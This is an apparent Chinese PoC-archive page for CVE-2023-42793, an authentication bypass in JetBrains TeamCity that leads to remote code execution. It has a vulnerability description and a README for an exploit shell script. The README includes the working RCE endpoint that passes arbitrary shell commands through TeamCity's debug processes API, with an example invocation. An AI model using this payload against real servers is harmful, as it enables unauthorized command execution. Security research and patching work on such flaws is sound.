关联漏洞
标题:
JetBrains TeamCity 安全漏洞
(CVE-2023-42793)
描述:JetBrains TeamCity是捷克JetBrains公司的一套分布式构建管理和持续集成工具。该工具提供持续单元测试、代码质量分析和构建问题分析报告等功能。 JetBrains TeamCity 2023.05.4之前版本存在安全漏洞,该漏洞源于攻击者可以绕过身份验证,导致在 TeamCity 服务器上执行RCE 。
描述
teamcity-exploit-cve-2023-42793
介绍
# TeamCity Exploit Cve 2023 42793
A quick script to exploit the cve-2023-42793 bug. Some additional reading on the exploit can be found here:
https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793
https://www.cnblogs.com/LittleHann/p/17843271.html
This script adds in the ability to use "params" freely to execute commands after triggering the RCE bug:
`RCE_ENDPOINT="${BASE_URL}:${PORT}/app/rest/debug/processes?exePath=sh¶ms=-c¶ms=${URLCMD}"`
## To run the script:
`Usage: <base_url> <port> <command>`
## Example:
`./TeamCity.sh blah.com 8111 "ls -lah"`
The original script is here, full credit needs to go to them: https://github.com/Zenmovie/CVE-2023-42793
文件快照
[4.0K] /data/pocs/e447b3c259383fc3e406ae8e3c4149e24cd2e0bf
├── [ 742] README.md
└── [1.3K] TeamCity.sh
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。